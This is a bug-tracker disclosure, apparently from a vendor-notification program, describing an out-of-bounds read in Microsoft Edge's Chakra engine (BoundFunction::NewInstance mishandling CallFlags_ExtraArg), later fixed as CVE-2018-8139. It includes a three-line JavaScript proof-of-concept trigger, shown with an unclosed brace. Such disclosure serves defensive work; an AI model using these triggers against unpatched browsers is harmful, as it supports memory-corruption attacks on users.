New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Fixed
Closed: Jul 2018

Sign in to add a comment

Issue 1569: Microsoft Edge: Chakra: A bug in BoundFunction::NewInstance

Reported by, May 4 2018 Project Member

Issue description

BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument ( in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.

function func() {;

let bound = func.bind({}, 1);

Reflect.construct(bound, []);

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Comment 1 by, May 17 2018

Project Member
Description: Show this description

Comment 2 by, Jul 11 2018

Project Member
Labels: CVE-2018-8139
Status: Fixed (was: New)

Comment 3 Deleted

Comment 4 by, Jul 11 2018

Project Member
Labels: -Restrict-View-Commit

Sign in to add a comment